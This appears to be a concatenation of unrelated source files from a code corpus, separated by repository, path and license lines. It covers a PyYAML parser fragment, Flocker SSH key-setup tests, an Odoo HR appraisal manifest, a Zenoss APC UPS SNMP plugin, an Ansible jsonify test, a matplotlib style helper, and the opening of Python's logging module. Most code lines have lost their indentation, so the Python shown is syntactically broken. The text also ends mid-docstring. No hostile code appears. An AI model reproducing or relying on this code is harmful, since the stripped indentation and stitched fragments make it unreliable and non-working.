def parse_flow_sequence_entry(self, first=False):
if not self.check_token(FlowSequenceEndToken):
if not first:
if self.check_token(FlowEntryToken):
self.get_token()
else:
token = self.peek_token()
raise ParserError("while parsing a flow sequence", self.marks[-1],
"expected ',' or ']', but got %r" % token.id, token.start_mark)
if self.check_token(KeyToken):
token = self.peek_token()
event = MappingStartEvent(None, None, True,
token.start_mark, token.end_mark,
flow_style=True)
self.state = self.parse_flow_sequence_entry_mapping_key
return event
elif not self.check_token(FlowSequenceEndToken):
self.states.append(self.parse_flow_sequence_entry)
return self.parse_flow_node()
token = self.get_token()
event = SequenceEndEvent(token.start_mark, token.end_mark)
self.state = self.states.pop()
self.marks.pop()
return event
def parse_flow_sequence_entry_mapping_key(self):
token = self.get_token()
if not self.check_token(ValueToken,
FlowEntryToken, FlowSequenceEndToken):
self.states.append(self.parse_flow_sequence_entry_mapping_value)
return self.parse_flow_node()
else:
self.state = self.parse_flow_sequence_entry_mapping_value
return self.process_empty_scalar(token.end_mark)
def parse_flow_sequence_entry_mapping_value(self):
if self.check_token(ValueToken):
token = self.get_token()
if not self.check_token(FlowEntryToken, FlowSequenceEndToken):
self.states.append(self.parse_flow_sequence_entry_mapping_end)
return self.parse_flow_node()
else:
self.state = self.parse_flow_sequence_entry_mapping_end
return self.process_empty_scalar(token.end_mark)
else:
self.state = self.parse_flow_sequence_entry_mapping_end
token = self.peek_token()
return self.process_empty_scalar(token.start_mark)
def parse_flow_sequence_entry_mapping_end(self):
self.state = self.parse_flow_sequence_entry
token = self.peek_token()
return MappingEndEvent(token.start_mark, token.start_mark)
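    # For example (illustrative), the flow sequence [a: 1, b] contains a
    # single-pair mapping as its first entry; the three states above emit
    # MappingStart, Scalar('a'), Scalar('1') and MappingEnd events for it
    # before the plain scalar 'b' is parsed.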
# flow_mapping ::= FLOW-MAPPING-START
# (flow_mapping_entry FLOW-ENTRY)*
# flow_mapping_entry?
# FLOW-MAPPING-END
# flow_mapping_entry ::= flow_node | KEY flow_node? (VALUE flow_node?)?
def parse_flow_mapping_first_key(self):
token = self.get_token()
self.marks.append(token.start_mark)
return self.parse_flow_mapping_key(first=True)
def parse_flow_mapping_key(self, first=False):
if not self.check_token(FlowMappingEndToken):
if not first:
if self.check_token(FlowEntryToken):
self.get_token()
else:
token = self.peek_token()
raise ParserError("while parsing a flow mapping", self.marks[-1],
"expected ',' or '}', but got %r" % token.id, token.start_mark)
if self.check_token(KeyToken):
token = self.get_token()
if not self.check_token(ValueToken,
FlowEntryToken, FlowMappingEndToken):
self.states.append(self.parse_flow_mapping_value)
return self.parse_flow_node()
else:
self.state = self.parse_flow_mapping_value
return self.process_empty_scalar(token.end_mark)
elif not self.check_token(FlowMappingEndToken):
self.states.append(self.parse_flow_mapping_empty_value)
return self.parse_flow_node()
token = self.get_token()
event = MappingEndEvent(token.start_mark, token.end_mark)
self.state = self.states.pop()
self.marks.pop()
return event
def parse_flow_mapping_value(self):
if self.check_token(ValueToken):
token = self.get_token()
if not self.check_token(FlowEntryToken, FlowMappingEndToken):
self.states.append(self.parse_flow_mapping_key)
return self.parse_flow_node()
else:
self.state = self.parse_flow_mapping_key
return self.process_empty_scalar(token.end_mark)
else:
self.state = self.parse_flow_mapping_key
token = self.peek_token()
return self.process_empty_scalar(token.start_mark)
def parse_flow_mapping_empty_value(self):
self.state = self.parse_flow_mapping_key
return self.process_empty_scalar(self.peek_token().start_mark)
def process_empty_scalar(self, mark):
return ScalarEvent(None, None, (True, False), u'', mark, mark)
| mit |
Azulinho/flocker | flocker/cli/functional/test_sshconfig.py | 15 | 9942 | # Copyright Hybrid Logic Ltd. See LICENSE file for details.
"""
Tests for ``flocker.cli._sshconfig``.
"""
from os.path import expanduser
from socket import socket
from subprocess import CalledProcessError
from twisted.trial.unittest import TestCase
from twisted.python.filepath import FilePath, Permissions
from twisted.internet.threads import deferToThread
from .. import configure_ssh
from .._sshconfig import OpenSSHConfiguration
from ...testtools.ssh import create_ssh_server, create_ssh_agent, if_conch
try:
from twisted.conch.ssh.keys import Key
except ImportError:
pass
def goodlines(path):
"""
Return a list of lines read from ``path`` excluding those that are blank
or begin with ``#``.
:param FilePath path: The path to the file to read.
:return: A ``list`` of ``bytes`` giving good lines from the file.
"""
return list(line for line in path.getContent().splitlines()
if line and not line.strip().startswith(b"#"))
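# For example (illustrative), a file containing
#
#     # flocker key
#     ssh-rsa AAAAB3Nz example-comment
#
# yields [b"ssh-rsa AAAAB3Nz example-comment"]; blank lines and comments are
# dropped so key material can be compared directly.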
class ConfigureSSHTests(TestCase):
"""
Tests for ``configure_ssh``.
"""
def setUp(self):
self.ssh_config = FilePath(self.mktemp())
self.server = create_ssh_server(self.ssh_config)
# Create a fake local keypair
self.addCleanup(self.server.restore)
self.flocker_config = FilePath(self.mktemp())
self.config = OpenSSHConfiguration(
ssh_config_path=self.ssh_config,
flocker_path=self.flocker_config)
self.config.create_keypair()
self.configure_ssh = self.config.configure_ssh
self.agent = create_ssh_agent(self.server.key_path, testcase=self)
def test_connection_failed(self):
"""
If an SSH connection cannot be established to the given address then an
exception is raised explaining that this is so.
"""
# Bind a port and guarantee it is not accepting connections.
blocker = socket()
blocker.bind((b"127.0.0.1", 0))
port = blocker.getsockname()[1]
exc = self.assertRaises(CalledProcessError,
self.configure_ssh, b"127.0.0.1", port)
# There are different error messages on different platforms.
# On Linux the error may be:
# 'ssh: connect to host 127.0.0.1 port 34716: Connection refused\r\n'
# On OS X the error may be:
# 'ssh: connect to host 127.0.0.1 port 56711: Operation timed out\r\n'
self.assertTrue(b"refused" in exc.output or "Operation timed out" in
exc.output)
def test_authorized_keys(self):
"""
When the SSH connection is established, the ``~/.ssh/authorized_keys``
file has the public part of the generated key pair appended to it.
"""
configuring = deferToThread(
self.configure_ssh, self.server.ip, self.server.port)
def configured(ignored):
id_rsa_pub = self.ssh_config.child(b"id_rsa_flocker.pub")
keys = self.server.home.descendant([b".ssh", b"authorized_keys"])
# Compare the contents ignoring comments for ease.
self.assertEqual(goodlines(id_rsa_pub), goodlines(keys))
configuring.addCallback(configured)
return configuring
def test_authorized_keys_already_in_place(self):
"""
When the SSH connection is established, if the
``~/.ssh/authorized_keys`` file already has the public part of the key
pair then it is not appended again.
"""
configuring = deferToThread(
self.configure_ssh, self.server.ip, self.server.port)
configuring.addCallback(
lambda ignored:
deferToThread(
self.configure_ssh, self.server.ip, self.server.port))
def configured(ignored):
id_rsa_pub = self.ssh_config.child(b"id_rsa_flocker.pub")
keys = self.server.home.descendant([b".ssh", b"authorized_keys"])
self.assertEqual(goodlines(id_rsa_pub), goodlines(keys))
configuring.addCallback(configured)
return configuring
def test_existing_authorized_keys_preserved(self):
"""
Any unrelated content in the ``~/.ssh/authorized_keys`` file is left in
place by ``configure_ssh``.
"""
existing_keys = (
b"ssh-dss AAAAB3Nz1234567890 comment\n"
b"ssh-dss AAAAB3Nz0987654321 comment\n"
)
ssh_path = self.server.home.child(b".ssh")
ssh_path.makedirs()
authorized_keys = ssh_path.child(b"authorized_keys")
authorized_keys.setContent(existing_keys)
configuring = deferToThread(
self.configure_ssh, self.server.ip, self.server.port)
def configured(ignored):
self.assertIn(existing_keys, authorized_keys.getContent())
configuring.addCallback(configured)
return configuring
def test_flocker_keypair_written(self):
"""
``configure_ssh`` writes the keypair to ``id_rsa_flocker`` and
``id_rsa_flocker.pub`` remotely.
"""
configuring = deferToThread(
self.configure_ssh, self.server.ip, self.server.port)
def configured(ignored):
expected = (
self.ssh_config.child(b"id_rsa_flocker").getContent(),
self.ssh_config.child(b"id_rsa_flocker.pub").getContent()
)
actual = (
self.flocker_config.child(b"id_rsa_flocker").getContent(),
self.flocker_config.child(b"id_rsa_flocker.pub").getContent()
)
self.assertEqual(expected, actual)
configuring.addCallback(configured)
return configuring
def test_flocker_keypair_permissions(self):
"""
``configure_ssh`` writes the remote keypair with secure permissions.
"""
configuring = deferToThread(
self.configure_ssh, self.server.ip, self.server.port)
expected_private_key_permissions = Permissions(0600)
expected_public_key_permissions = Permissions(0644)
def configured(ignored):
expected = (
expected_private_key_permissions,
expected_public_key_permissions
)
actual = (
self.flocker_config.child(b"id_rsa_flocker").getPermissions(),
self.flocker_config.child(
b"id_rsa_flocker.pub").getPermissions()
)
self.assertEqual(expected, actual)
configuring.addCallback(configured)
return configuring
class CreateKeyPairTests(TestCase):
"""
Tests for ``create_keypair``.
"""
@if_conch
def test_key_generated(self):
"""
``create_keypair`` generates a new key pair and writes it locally to
``id_rsa_flocker`` and ``id_rsa_flocker.pub``.
"""
ssh_config = FilePath(self.mktemp())
configurator = OpenSSHConfiguration(
ssh_config_path=ssh_config, flocker_path=None)
configurator.create_keypair()
id_rsa = ssh_config.child(b"id_rsa_flocker")
id_rsa_pub = ssh_config.child(b"id_rsa_flocker.pub")
key = Key.fromFile(id_rsa.path)
self.assertEqual(
# Avoid comparing the comment
key.public().toString(
type="OPENSSH", extra='test comment').split(None, 2)[:2],
id_rsa_pub.getContent().split(None, 2)[:2])
@if_conch
def test_key_not_regenerated(self):
"""
``create_keypair`` does not generate a new key pair if one can
already be found in ``id_rsa_flocker`` and ``id_rsa_flocker.pub``.
"""
ssh_config = FilePath(self.mktemp())
configurator = OpenSSHConfiguration(
ssh_config_path=ssh_config, flocker_path=None)
id_rsa = ssh_config.child(b"id_rsa_flocker")
configurator.create_keypair()
expected_key = Key.fromFile(id_rsa.path)
configurator.create_keypair()
self.assertEqual(expected_key, Key.fromFile(id_rsa.path))
def test_key_permissions(self):
"""
``create_keypair`` sets secure permissions on
``id_rsa_flocker`` and ``id_rsa_flocker.pub``.
"""
ssh_config = FilePath(self.mktemp())
configurator = OpenSSHConfiguration(
ssh_config_path=ssh_config, flocker_path=None)
configurator.create_keypair()
expected_private_key_permissions = Permissions(0600)
expected_public_key_permissions = Permissions(0644)
id_rsa = ssh_config.child(b"id_rsa_flocker")
id_rsa_pub = ssh_config.child(b"id_rsa_flocker.pub")
self.assertEqual(
(expected_private_key_permissions,
expected_public_key_permissions),
(id_rsa.getPermissions(), id_rsa_pub.getPermissions()))
class OpenSSHDefaultsTests(TestCase):
"""
Tests for `OpenSSHConfiguration.defaults``.
"""
def test_flocker_path(self):
"""
``OpenSSHConfiguration.defaults`` creates an instance with
``/etc/flocker`` as the Flocker configuration path.
"""
self.assertEqual(
FilePath(b"/etc/flocker"),
OpenSSHConfiguration.defaults().flocker_path)
def test_ssh_config_path(self):
"""
``OpenSSHConfiguration.defaults`` creates an instance with the current
user's SSH configuration path as the SSH configuration path.
"""
expected = FilePath(expanduser(b"~")).child(b".ssh")
self.assertEqual(
expected, OpenSSHConfiguration.defaults().ssh_config_path)
def test_configure_ssh(self):
"""
``configure_ssh`` is taken from an ``OpenSSHConfiguration`` instance
created using the ``defaults`` method.
"""
self.assertEqual(
OpenSSHConfiguration.defaults().configure_ssh, configure_ssh)
| apache-2.0 |
vrenaville/OCB | addons/hr_evaluation/__openerp__.py | 53 | 3305 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Employee Appraisals',
'version': '0.1',
'author': 'OpenERP SA',
'category': 'Human Resources',
'sequence': 31,
'website': 'https://www.odoo.com/page/appraisal',
'summary': 'Periodical Evaluations, Appraisals, Surveys',
'images': ['images/hr_evaluation_analysis.jpeg',
'images/hr_evaluation.jpeg',
'images/hr_interview_requests.jpeg'],
'depends': ['hr', 'calendar', 'survey'],
'description': """
Periodical employee evaluations and appraisals
==============================================
By using this application you can maintain the motivational process by doing periodical evaluations of your employees' performance. The regular assessment of human resources can benefit your people as well as your organization.
An evaluation plan can be assigned to each employee. These plans define the frequency and the way you manage your periodic personal evaluations. You will be able to define steps and attach interview forms to each step.
Manages several types of evaluations: bottom-up, top-down, self-evaluations and the final evaluation by the manager.
Key Features
------------
* Ability to create employees evaluations.
* An evaluation can be created by an employee for subordinates and juniors, as well as for their manager.
* The evaluation is done according to a plan in which various surveys can be created. Each survey can be answered by a particular level in the employee hierarchy. The final review and evaluation is done by the manager.
* Every evaluation filled by employees can be viewed in a PDF form.
* Interview Requests are generated automatically by OpenERP according to employees' evaluation plans. Each user receives automatic emails and requests to perform a periodical evaluation of their colleagues.
""",
"data": [
'security/ir.model.access.csv',
'security/hr_evaluation_security.xml',
'hr_evaluation_view.xml',
'report/hr_evaluation_report_view.xml',
'survey_data_appraisal.xml',
'hr_evaluation_data.xml',
'hr_evaluation_installer.xml',
],
"demo": ["hr_evaluation_demo.xml"],
# 'test': [
# 'test/test_hr_evaluation.yml',
# 'test/hr_evalution_demo.yml',
# ],
'auto_install': False,
'installable': True,
'application': True,
}
| agpl-3.0 |
anksp21/Community-Zenpacks | ZenPacks.ZenSystems.ApcUps/ZenPacks/ZenSystems/ApcUps/modeler/plugins/ApcUpsDeviceMap.py | 2 | 2850 | ##########################################################################
# Author: Jane Curry, [email protected]
# Date: March 28th, 2011
# Revised:
#
# ApcUpsDevice modeler plugin
#
# This program can be used under the GNU General Public License version 2
# You can find full information here: http://www.zenoss.com/oss
#
##########################################################################
__doc__ = """ApcUpsDeviceMap
Gather information from APC UPS devices.
"""
from Products.DataCollector.plugins.CollectorPlugin import SnmpPlugin, GetMap
from Products.DataCollector.plugins.DataMaps import MultiArgs
import re
class ApcUpsDeviceMap(SnmpPlugin):
maptype = "ApcUpsDeviceMap"
snmpGetMap = GetMap({
'.1.3.6.1.4.1.318.1.1.1.1.1.1.0': 'setHWProductKey',
'.1.3.6.1.4.1.318.1.1.1.1.2.1.0': 'setOSProductKey',
'.1.3.6.1.4.1.318.1.1.1.1.2.3.0': 'setHWSerialNumber',
'.1.3.6.1.4.1.318.1.1.1.2.2.5.0': 'numBatteryPacks',
'.1.3.6.1.4.1.318.1.1.1.2.2.6.0': 'numBadBatteryPacks',
'.1.3.6.1.4.1.318.1.1.1.4.1.1.0': 'basicOutputStatus',
})
def condition(self, device, log):
"""only for boxes with proper object id
"""
return device.snmpOid.startswith(".1.3.6.1.4.1.318.1.3.2")
def process(self, device, results, log):
"""collect snmp information from this device"""
log.info('processing %s for device %s', self.name(), device.id)
getdata, tabledata = results
om = self.objectMap(getdata)
manufacturer = "American Power Conversion Corp."
om.setHWProductKey = MultiArgs(om.setHWProductKey, manufacturer)
# log.debug("HWProductKey=%s Manufacturer = %s" % (om.setHWProductKey, manufacturer))
om.setOSProductKey = MultiArgs(om.setOSProductKey, manufacturer)
# log.debug("OSProductKey=%s Manufacturer = %s" % (om.setOSProductKey, manufacturer))
if (om.basicOutputStatus < 1 or om.basicOutputStatus > 12):
om.basicOutputStatus = 1
index = om.basicOutputStatus
om.basicOutputStatusText = self.basicOutputStatusMap[index]
return om
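    # Illustrative check (the community string and host are assumptions, not
    # part of this plugin): the status OID polled above can be read manually
    # with net-snmp to verify the mapping below, e.g.
    #
    #     snmpget -v1 -c public <ups-host> .1.3.6.1.4.1.318.1.1.1.4.1.1.0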
basicOutputStatusMap = { 1: 'Unknown',
2: 'onLine',
3: 'onBattery',
4: 'onSmartBoost',
5: 'timedSleeping',
6: 'softwareBypass',
7: 'off',
8: 'rebooting',
9: 'switchedBypass',
10: 'hardwareFailureBypass',
11: 'sleepingUntilPowerReturn',
12: 'onSmartTrim',
}
| gpl-2.0 |
shepdelacreme/ansible | test/units/parsing/utils/test_jsonify.py | 113 | 1491 | # -*- coding: utf-8 -*-
# (c) 2016, James Cammarata <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from units.compat import unittest
from ansible.parsing.utils.jsonify import jsonify
class TestJsonify(unittest.TestCase):
def test_jsonify_simple(self):
self.assertEqual(jsonify(dict(a=1, b=2, c=3)), '{"a": 1, "b": 2, "c": 3}')
def test_jsonify_simple_format(self):
res = jsonify(dict(a=1, b=2, c=3), format=True)
cleaned = "".join([x.strip() for x in res.splitlines()])
self.assertEqual(cleaned, '{"a": 1,"b": 2,"c": 3}')
def test_jsonify_unicode(self):
self.assertEqual(jsonify(dict(toshio=u'くらとみ')), u'{"toshio": "くらとみ"}')
def test_jsonify_empty(self):
self.assertEqual(jsonify(None), '{}')
| gpl-3.0 |
sharthee/ProgrammingAssignment2 | labs/lab2/cs109style.py | 38 | 1293 | from __future__ import print_function
from IPython.core.display import HTML
from matplotlib import rcParams
#colorbrewer2 Dark2 qualitative color table
dark2_colors = [(0.10588235294117647, 0.6196078431372549, 0.4666666666666667),
(0.8509803921568627, 0.37254901960784315, 0.00784313725490196),
(0.4588235294117647, 0.4392156862745098, 0.7019607843137254),
(0.9058823529411765, 0.1607843137254902, 0.5411764705882353),
(0.4, 0.6509803921568628, 0.11764705882352941),
(0.9019607843137255, 0.6705882352941176, 0.00784313725490196),
(0.6509803921568628, 0.4627450980392157, 0.11372549019607843),
(0.4, 0.4, 0.4)]
def customize_mpl():
"""Tweak matplotlib visual style"""
print("Setting custom matplotlib visual style")
rcParams['figure.figsize'] = (10, 6)
rcParams['figure.dpi'] = 150
rcParams['axes.color_cycle'] = dark2_colors
rcParams['lines.linewidth'] = 2
rcParams['axes.grid'] = True
rcParams['axes.facecolor'] = '#eeeeee'
rcParams['font.size'] = 14
rcParams['patch.edgecolor'] = 'none'
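# Typical notebook usage (illustrative): call these in a cell, keeping
# customize_css() below as the last expression so IPython renders the HTML.
#
#     customize_mpl()
#     customize_css()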
def customize_css():
print("Setting custom CSS for the IPython Notebook")
styles = open('custom.css', 'r').read()
return HTML(styles)
| mit |
40223240/cadb_g3_0420 | static/Brython3.1.1-20150328-091302/Lib/logging/__init__.py | 733 | 66279 | # Copyright 2001-2013 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Logging package for Python. Based on PEP 282 and comments thereto in
comp.lang.python.
Copyright (C) 2001-2013 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging' and log away!
"""
import sys, os, time, io, traceback, warnings, weakref
from string import Template
__all__ = ['BASIC_FORMAT', 'BufferingFormatter', 'CRITICAL', 'DEBUG', 'ERROR',
'FATAL', 'FileHandler', 'Filter', 'Formatter', 'Handler', 'INFO',
'LogRecord', 'Logger', 'LoggerAdapter', 'NOTSET', 'NullHandler',
'StreamHandler', 'WARN', 'WARNING', 'addLevelName', 'basicConfig',
'captureWarnings', 'critical', 'debug', 'disable', 'error',
'exception', 'fatal', 'getLevelName', 'getLogger', 'getLoggerClass',
'info', 'log', 'makeLogRecord', 'setLoggerClass', 'warn', 'warning',
'getLogRecordFactory', 'setLogRecordFactory', 'lastResort']
try:
import threading
except ImportError: #pragma: no cover
threading = None
__author__ = "Vinay Sajip <[email protected]>"
__status__ = "production"
__version__ = "0.5.1.2"
__date__ = "07 February 2010"
#---------------------------------------------------------------------------
# Miscellaneous module data
#---------------------------------------------------------------------------
#
# _srcfile is used when walking the stack to check when we've got the first
# caller stack frame.
#
if hasattr(sys, 'frozen'): #support for py2exe
_srcfile = "logging%s__init__%s" % (os.sep, __file__[-4:])
else:
_srcfile = __file__
_srcfile = os.path.normcase(_srcfile)
if hasattr(sys, '_getframe'):
currentframe = lambda: sys._getframe(3)
else: #pragma: no cover
def currentframe():
"""Return the frame object for the caller's stack frame."""
try:
raise Exception
except:
return sys.exc_info()[2].tb_frame.f_back
# _srcfile is only used in conjunction with sys._getframe().
# To provide compatibility with older versions of Python, set _srcfile
# to None if _getframe() is not available; this value will prevent
# findCaller() from being called.
#if not hasattr(sys, "_getframe"):
# _srcfile = None
#
#_startTime is used as the base when calculating the relative time of events
#
_startTime = time.time()
#
#raiseExceptions is used to see if exceptions during handling should be
#propagated
#
raiseExceptions = True
#
# If you don't want threading information in the log, set this to zero
#
logThreads = True
#
# If you don't want multiprocessing information in the log, set this to zero
#
logMultiprocessing = True
#
# If you don't want process information in the log, set this to zero
#
logProcesses = True
#---------------------------------------------------------------------------
# Level related stuff
#---------------------------------------------------------------------------
#
# Default levels and level names, these can be replaced with any positive set
# of values having corresponding names. There is a pseudo-level, NOTSET, which
# is only really there as a lower limit for user-defined levels. Handlers and
# loggers are initialized with NOTSET so that they will log all messages, even
# at user-defined levels.
#
CRITICAL = 50
FATAL = CRITICAL
ERROR = 40
WARNING = 30
WARN = WARNING
INFO = 20
DEBUG = 10
NOTSET = 0
_levelNames = {
CRITICAL : 'CRITICAL',
ERROR : 'ERROR',
WARNING : 'WARNING',
INFO : 'INFO',
DEBUG : 'DEBUG',
NOTSET : 'NOTSET',
'CRITICAL' : CRITICAL,
'ERROR' : ERROR,
'WARN' : WARNING,
'WARNING' : WARNING,
'INFO' : INFO,
'DEBUG' : DEBUG,
'NOTSET' : NOTSET,
}
def getLevelName(level):
"""
Return the textual representation of logging level 'level'.
If the level is one of the predefined levels (CRITICAL, ERROR, WARNING,
INFO, DEBUG) then you get the corresponding string. If you have
associated levels with names using addLevelName then the name you have
associated with 'level' is returned.
If a numeric value corresponding to one of the defined levels is passed
in, the corresponding string representation is returned.
Otherwise, the string "Level %s" % level is returned.
"""
return _levelNames.get(level, ("Level %s" % level))
def addLevelName(level, levelName):
"""
Associate 'levelName' with 'level'.
This is used when converting levels to text during message formatting.
"""
_acquireLock()
try: #unlikely to cause an exception, but you never know...
_levelNames[level] = levelName
_levelNames[levelName] = level
finally:
_releaseLock()
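# Illustrative sketch (the level value and name are assumptions, not stdlib
# defaults): a custom level registered this way resolves in both directions
# through _levelNames.
#
#     TRACE = 5
#     addLevelName(TRACE, 'TRACE')
#     getLevelName(5)        # -> 'TRACE'
#     getLevelName('TRACE')  # -> 5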
def _checkLevel(level):
if isinstance(level, int):
rv = level
elif str(level) == level:
if level not in _levelNames:
raise ValueError("Unknown level: %r" % level)
rv = _levelNames[level]
else:
raise TypeError("Level not an integer or a valid string: %r" % level)
return rv
#---------------------------------------------------------------------------
# Thread-related stuff
#---------------------------------------------------------------------------
#
#_lock is used to serialize access to shared data structures in this module.
#This needs to be an RLock because fileConfig() creates and configures
#Handlers, and so might arbitrary user threads. Since Handler code updates the
#shared dictionary _handlers, it needs to acquire the lock. But if configuring,
#the lock would already have been acquired - so we need an RLock.
#The same argument applies to Loggers and Manager.loggerDict.
#
if threading:
_lock = threading.RLock()
else: #pragma: no cover
_lock = None
def _acquireLock():
"""
Acquire the module-level lock for serializing access to shared data.
This should be released with _releaseLock().
"""
if _lock:
_lock.acquire()
def _releaseLock():
"""
Release the module-level lock acquired by calling _acquireLock().
"""
if _lock:
_lock.release()
#---------------------------------------------------------------------------
# The logging record
#---------------------------------------------------------------------------
class LogRecord(object):
"""
A LogRecord instance represents an event being logged.
LogRecord instances are created every time something is logged. They
contain all the information pertinent to the event being logged. The
main information passed in is in msg and args, which are combined
using str(msg) % args to create the message field of the record. The
record also includes information such as when the record was created,
the source line where the logging call was made, and any exception
information to be logged.
"""
def __init__(self, name, level, pathname, lineno,
msg, args, exc_info, func=None, sinfo=None, **kwargs):
"""
Initialize a logging record with interesting information.
"""
ct = time.time()
self.name = name
self.msg = msg
#
# The following statement allows passing of a dictionary as a sole
# argument, so that you can do something like
# logging.debug("a %(a)d b %(b)s", {'a':1, 'b':2})
# Suggested by Stefan Behnel.
# Note that without the test for args[0], we get a problem because
# during formatting, we test to see if the arg is present using
# 'if self.args:'. If the event being logged is e.g. 'Value is %d'
# and if the passed arg fails 'if self.args:' then no formatting
# is done. For example, logger.warning('Value is %d', 0) would log
# 'Value is %d' instead of 'Value is 0'.
# For the use case of passing a dictionary, this should not be a
# problem.
if args and len(args) == 1 and isinstance(args[0], dict) and args[0]:
args = args[0]
self.args = args
self.levelname = getLevelName(level)
self.levelno = level
self.pathname = pathname
try:
self.filename = os.path.basename(pathname)
self.module = os.path.splitext(self.filename)[0]
except (TypeError, ValueError, AttributeError):
self.filename = pathname
self.module = "Unknown module"
self.exc_info = exc_info
self.exc_text = None # used to cache the traceback text
self.stack_info = sinfo
self.lineno = lineno
self.funcName = func
self.created = ct
self.msecs = (ct - int(ct)) * 1000
self.relativeCreated = (self.created - _startTime) * 1000
if logThreads and threading:
self.thread = threading.get_ident()
self.threadName = threading.current_thread().name
else: # pragma: no cover
self.thread = None
self.threadName = None
if not logMultiprocessing: # pragma: no cover
self.processName = None
else:
self.processName = 'MainProcess'
mp = sys.modules.get('multiprocessing')
if mp is not None:
# Errors may occur if multiprocessing has not finished loading
# yet - e.g. if a custom import hook causes third-party code
# to run when multiprocessing calls import. See issue 8200
# for an example
try:
self.processName = mp.current_process().name
except Exception: #pragma: no cover
pass
if logProcesses and hasattr(os, 'getpid'):
self.process = os.getpid()
else:
self.process = None
def __str__(self):
return '<LogRecord: %s, %s, %s, %s, "%s">'%(self.name, self.levelno,
self.pathname, self.lineno, self.msg)
def getMessage(self):
"""
Return the message for this LogRecord.
Return the message for this LogRecord after merging any user-supplied
arguments with the message.
"""
msg = str(self.msg)
if self.args:
msg = msg % self.args
return msg
#
# Determine which class to use when instantiating log records.
#
_logRecordFactory = LogRecord
def setLogRecordFactory(factory):
"""
Set the factory to be used when instantiating a log record.
:param factory: A callable which will be called to instantiate
a log record.
"""
global _logRecordFactory
_logRecordFactory = factory
def getLogRecordFactory():
"""
Return the factory to be used when instantiating a log record.
"""
return _logRecordFactory
def makeLogRecord(dict):
"""
Make a LogRecord whose attributes are defined by the specified dictionary,
This function is useful for converting a logging event received over
a socket connection (which is sent as a dictionary) into a LogRecord
instance.
"""
rv = _logRecordFactory(None, None, "", 0, "", (), None, None)
rv.__dict__.update(dict)
return rv
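# For example (illustrative):
#
#     rv = makeLogRecord({'name': 'net', 'levelno': INFO,
#                         'levelname': 'INFO', 'msg': 'link up'})
#     rv.getMessage()  # -> 'link up'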
#---------------------------------------------------------------------------
# Formatter classes and functions
#---------------------------------------------------------------------------
class PercentStyle(object):
default_format = '%(message)s'
asctime_format = '%(asctime)s'
asctime_search = '%(asctime)'
def __init__(self, fmt):
self._fmt = fmt or self.default_format
def usesTime(self):
return self._fmt.find(self.asctime_search) >= 0
def format(self, record):
return self._fmt % record.__dict__
class StrFormatStyle(PercentStyle):
default_format = '{message}'
asctime_format = '{asctime}'
asctime_search = '{asctime'
def format(self, record):
return self._fmt.format(**record.__dict__)
class StringTemplateStyle(PercentStyle):
default_format = '${message}'
asctime_format = '${asctime}'
asctime_search = '${asctime}'
def __init__(self, fmt):
self._fmt = fmt or self.default_format
self._tpl = Template(self._fmt)
def usesTime(self):
fmt = self._fmt
return fmt.find('$asctime') >= 0 or fmt.find(self.asctime_format) >= 0
def format(self, record):
return self._tpl.substitute(**record.__dict__)
_STYLES = {
'%': PercentStyle,
'{': StrFormatStyle,
'$': StringTemplateStyle
}
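# The three styles express the same layout (illustrative):
#
#     '%(levelname)s:%(name)s:%(message)s'    # style='%'
#     '{levelname}:{name}:{message}'          # style='{'
#     '${levelname}:${name}:${message}'       # style='$'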
class Formatter(object):
"""
Formatter instances are used to convert a LogRecord to text.
Formatters need to know how a LogRecord is constructed. They are
responsible for converting a LogRecord to (usually) a string which can
be interpreted by either a human or an external system. The base Formatter
allows a formatting string to be specified. If none is supplied, the
default value of "%s(message)" is used.
The Formatter can be initialized with a format string which makes use of
knowledge of the LogRecord attributes - e.g. the default value mentioned
above makes use of the fact that the user's message and arguments are pre-
formatted into a LogRecord's message attribute. Currently, the useful
attributes in a LogRecord are described by:
%(name)s Name of the logger (logging channel)
%(levelno)s Numeric logging level for the message (DEBUG, INFO,
WARNING, ERROR, CRITICAL)
%(levelname)s Text logging level for the message ("DEBUG", "INFO",
"WARNING", "ERROR", "CRITICAL")
%(pathname)s Full pathname of the source file where the logging
call was issued (if available)
%(filename)s Filename portion of pathname
%(module)s Module (name portion of filename)
%(lineno)d Source line number where the logging call was issued
(if available)
%(funcName)s Function name
%(created)f Time when the LogRecord was created (time.time()
return value)
%(asctime)s Textual time when the LogRecord was created
%(msecs)d Millisecond portion of the creation time
%(relativeCreated)d Time in milliseconds when the LogRecord was created,
relative to the time the logging module was loaded
(typically at application startup time)
